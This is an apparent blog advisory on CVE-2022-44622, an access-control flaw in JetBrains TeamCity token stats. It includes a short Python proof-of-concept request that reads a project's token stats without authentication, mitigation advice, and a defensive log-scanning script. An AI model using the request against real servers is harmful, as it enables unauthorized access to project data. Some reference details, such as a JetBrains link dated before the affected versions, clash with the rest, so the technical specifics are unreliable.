In today's world of ever-evolving technology, it's crucial to stay on top of your software and systems to ensure the highest degree of security. Unfortunately, vulnerabilities often surface, opening the door for hackers to exploit these weak points. One such vulnerability has been discovered in JetBrains TeamCity versions between 2021.2 and 2022.10, where access permissions for secure token health items are excessive. In this post, we'll dive deep into this vulnerability, explore its implications, and learn how to mitigate its risks.

CVE-2022-44622: Vulnerability Overview
The vulnerability, identified as CVE-2022-44622, exists in JetBrains TeamCity, a popular continuous integration and deployment server used by development teams across the globe. It is caused by an oversight in the access control mechanism, which has led to excessive access permissions on secure token health items.

This vulnerability allows unauthorized users to access sensitive project data in TeamCity installations. More specifically, it enables unauthorized users to call REST API methods and access project-level secured token stats like project token usage, token creation, and invalidation without having appropriate permissions.

Original References

The vulnerability was reported to JetBrains by a security researcher, and the issue has been documented on MITRE's official CVE database, available here:

- CVE-2022-44622: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44622
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44622
- JetBrains: https://blog.jetbrains.com/teamcity/2022/02/teamcity-2022-1-the-blocker-issue/

Exploit Details

An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected TeamCity server. The following code snippet demonstrates a Python script to exploit this vulnerability:

import requests

teamcity_url = "http://teamcity.example.com/"
api_endpoint = "app/rest/tokenStats"
project_id = "your_project_id"

# Build the REST URL for the project's token stats
url = f"{teamcity_url}{api_endpoint}?locator=project:{project_id}"
headers = {"Accept": "application/json"}

# No credentials are sent; on an affected server the request still succeeds
response = requests.get(url, headers=headers, timeout=10)

if response.status_code == 200:
    print(f"Token stats for project {project_id}:")
    print(response.text)
else:
    print(f"Failed to retrieve token stats for project {project_id} (HTTP {response.status_code})")

This script attempts to access the token stats for a specified project without any authentication or proper project permissions.

Mitigation

To mitigate CVE-2022-44622, JetBrains has released a security patch for TeamCity. It is highly recommended to update your TeamCity installation to the latest version, which addresses this issue. You can download the latest version from here:

- JetBrains TeamCity Download: https://www.jetbrains.com/teamcity/download/

Make sure to also configure your TeamCity installation's access control to limit REST API access to authorized users only.
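As an added example (not part of the original post or of JetBrains' tooling), the following script scans web-server access logs for hits on the token-stats endpoint named above and flags unauthenticated requests that were served with HTTP 200, which is the symptom of the excessive-permission bug. It assumes logs in Apache common log format, where a "-" in the user field means no authenticated user; TeamCity's own access-log layout differs, so adapt the regex to your reverse proxy or server. The sample log lines are constructed.

```python
import re

# Assumption: Apache common log format (ip ident user [time] "method path proto" status size).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Endpoint named in the post; extend this tuple for other sensitive REST paths.
WATCHED_PATHS = ("/app/rest/tokenStats",)

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return a finding label for a parsed entry, or None if it is unremarkable."""
    path = entry["path"].split("?", 1)[0]
    if not any(path.startswith(p) for p in WATCHED_PATHS):
        return None
    unauthenticated = entry["user"] == "-"
    status = int(entry["status"])
    if unauthenticated and status == 200:
        return "UNAUTH_SUCCESS"   # endpoint served without a user: the bug was hit
    if unauthenticated:
        return "UNAUTH_BLOCKED"   # attempted but refused: expected on a patched server
    return "AUTH_ACCESS"          # authenticated use: review against project roles

def scan(lines):
    """Return (label, ip, path) tuples for every notable watched-endpoint request."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            findings.append((label, entry["ip"], entry["path"]))
    return findings

# Constructed sample log lines, not real traffic
SAMPLE_LOG = """\
203.0.113.7 - - [03/Nov/2022:14:20:01 +0000] "GET /app/rest/tokenStats?locator=project:Proj1 HTTP/1.1" 200 512
203.0.113.7 - - [03/Nov/2022:14:20:05 +0000] "GET /app/rest/builds HTTP/1.1" 401 0
198.51.100.9 - alice [03/Nov/2022:14:21:10 +0000] "GET /app/rest/tokenStats?locator=project:Proj1 HTTP/1.1" 200 512
192.0.2.4 - - [03/Nov/2022:14:22:00 +0000] "GET /app/rest/tokenStats?locator=project:Proj2 HTTP/1.1" 403 0
""".splitlines()

if __name__ == "__main__":
    for label, ip, path in scan(SAMPLE_LOG):
        print(f"{label:15} {ip:15} {path}")
```

Any UNAUTH_SUCCESS finding on a server still in the affected version range should be treated as a likely disclosure of that project's token stats and followed by the upgrade described above.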

Conclusion

This vulnerability highlights the importance of keeping your software up-to-date and having proper access control mechanisms in place. By ensuring that your TeamCity installation is on the latest version and having proper access control configuration, you can reduce the risk of unauthorized access to your sensitive project data. Stay vigilant and always be on the lookout for any security updates or patches, as cyber threats continue to evolve and adapt to new situations.

Timeline

Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/04/2022 02:36:00 UTC